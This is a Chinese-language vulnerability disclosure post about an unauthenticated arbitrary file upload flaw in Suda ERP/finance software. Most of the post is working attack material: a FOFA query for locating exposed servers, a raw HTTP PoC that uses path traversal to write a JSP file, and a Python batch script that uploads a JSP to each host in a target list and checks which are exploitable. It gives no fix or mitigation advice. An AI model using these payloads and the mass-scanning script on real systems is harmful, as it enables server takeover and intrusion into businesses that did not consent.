跳到主要内容

速达软件全系产品存在任意文件上传漏洞

速达软件全系产品存在任意文件上传漏洞

速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷.

影响版本

速达A3.cloud BAS、速达A3.cloud STD、速达A30.cloud PRO、速达3000.online PRO、速达A4.cloud BAS、速达A4.cloud STD
速达A40.cloud PRO、速达4000.online PRO、速达A5.cloud STD、速达A50.cloud PRO、速达A70.cloud PRO
速达5000.online PRO、速达7000.online PRO

fofa

app="速达软件-公司产品"

poc

POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 28

<% out.print("984969719");%>

批量脚本

import requests
import argparse
poc = "/report/DesignReportSave.jsp?report=../625248.jsp"
headers = {
"User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36",
"Content-Type": "application/octet-stream"
}
data = '''<% out.print("This is a page !");%>'''
def chack(url):
try:
url = "http://"+url
reps = requests.post(url=url+poc,headers=headers,data=data,verify=False,timeout=5)
shell_path = url+"/625248.jsp"
repps = requests.get(url=shell_path,headers=headers,verify=False,timeout=3)
if repps.status_code == 200:
print(f"[+] 存在速达软件存在任意文件上传 url : {shell_path}")
else:
print(f"未发现速达软件存在任意文件上传 url : {url}")
except Exception as e:
print(f"ERROR : {e}")

def main():
parser = argparse.ArgumentParser(description='速达软件全系产品存在任意文件上传')
parser.add_argument('-u', '--url', type=str, help='URL to process')
parser.add_argument('-f', '--file', type=str, help='File path to process')

args = parser.parse_args()
if args.url:
chack(args.url)

elif args.file:
with open(args.file, 'r') as file:
lines = file.readlines()
for line in lines:
chack(line.strip())

else:
print("eg : python3 速达软件全系产品存在任意文件上传.py -u http://xx.xx.x.x")
print("eg : python3 速达软件全系产品存在任意文件上传.py -f 123.txt")

if __name__ == '__main__':
main()